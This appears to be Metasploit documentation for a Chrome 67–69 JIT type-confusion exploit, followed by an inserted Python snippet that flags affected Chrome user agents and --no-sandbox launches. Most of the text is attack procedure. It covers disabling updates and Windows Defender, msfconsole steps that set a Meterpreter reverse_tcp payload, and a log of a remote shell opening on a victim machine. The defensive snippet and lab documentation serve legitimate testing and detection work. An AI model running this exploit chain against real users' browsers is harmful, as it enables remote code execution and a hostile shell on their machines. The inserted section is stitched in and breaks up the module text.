This module exploits a type confusion in Google Chrome's JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. The type confusion can be used to construct an arbitrary read/write memory primitive, which is used to write shellcode into the rwx region of a WebAssembly object.
This module does not contain an exploit to escape the sandbox, so you must launch Google Chrome with the --no-sandbox option.
Vulnerable Application
The module is compatible with any 64-bit Google Chrome (version 67, 68 or 69) on any platform (macOS, Linux or Windows); however, the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.
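As an added defensive example (not part of the module or its documentation), the following Python flags proxy-log clients whose User-Agent advertises a 64-bit build of one of the affected Chrome major versions, and checks whether a Chrome command line carries the --no-sandbox flag the module requires. The log line format and the sample lines are constructed for this example.

```python
import re
import shlex

# Chrome major versions listed as affected in the module description.
AFFECTED_MAJORS = {67, 68, 69}

# Chrome/<major>.<minor>.<build>.<patch> token of a User-Agent string.
_CHROME_UA = re.compile(r"Chrome/(\d+)\.\d+\.\d+\.\d+")

# Constructed proxy log format: "<client-ip> <method> <path> \"<user-agent>\"".
_LOG_LINE = re.compile(r'^(\S+) \S+ \S+ "([^"]*)"$')

# Platform tokens that identify 64-bit Chrome builds (WOW64 means a 32-bit build).
_X64_TOKENS = ("Win64; x64", "x86_64", "Intel Mac OS X")


def chrome_major(user_agent):
    """Return the Chrome major version from a UA string, or None if absent."""
    m = _CHROME_UA.search(user_agent)
    return int(m.group(1)) if m else None


def is_affected_ua(user_agent):
    """True when the UA is a 64-bit build of an affected Chrome major version."""
    major = chrome_major(user_agent)
    if major not in AFFECTED_MAJORS:
        return False
    return any(tok in user_agent for tok in _X64_TOKENS)


def runs_without_sandbox(cmdline):
    """True when a Chrome command line disables the sandbox via --no-sandbox.

    posix=False keeps Windows backslash paths intact and keeps quoted paths
    with spaces as a single argument."""
    argv = shlex.split(cmdline, posix=False)
    exe = argv[0].strip('"').lower()
    is_chrome = exe.endswith(("chrome.exe", "chrome", "google-chrome"))
    return is_chrome and "--no-sandbox" in argv[1:]


def flag_vulnerable_clients(log_lines):
    """Return client IPs whose UA matches an affected 64-bit Chrome version."""
    flagged = []
    for line in log_lines:
        m = _LOG_LINE.match(line)
        if m and is_affected_ua(m.group(2)):
            flagged.append(m.group(1))
    return flagged


# Constructed sample log: one affected x64 client, one patched client, one 32-bit (WOW64) client.
SAMPLE_LOG = [
    '192.168.56.3 GET / "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"',
    '192.168.56.7 GET / "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36"',
    '192.168.56.9 GET / "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"',
]
```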
Vulnerable Application Installation Steps
You can download a vulnerable Chrome version from this location: https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/
You should ensure that the application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet). You may also need to disable Windows Defender.
Verification Steps
- Do: `use exploit/multi/browser/chrome_object_create`
- Do: `set payload windows/x64/meterpreter/reverse_tcp`
- Do: `set LHOST [IP]`
- Do: `set SRVHOST [IP]`
- Do: `set URIPATH / [PATH]`
- Do: `run`
Scenarios
Windows 10 and Google Chrome 69.0.3497.100 with --no-sandbox
Start Google Chrome without a sandbox:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox
msf5 > use exploit/multi/browser/chrome_object_create
msf5 exploit(multi/browser/chrome_object_create) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf5 exploit(multi/browser/chrome_object_create) > set URIPATH /
URIPATH => /
msf5 exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_object_create) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/browser/chrome_object_create) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
[*] 192.168.56.3 chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
[*] Sending stage (206403 bytes) to 192.168.56.3
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49682) at 2020-02-29 14:29:06 +0800
msf5 exploit(multi/browser/chrome_object_create) > sessions 1
[*] Starting interaction with 1...
meterpreter > pwd
C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.100
meterpreter >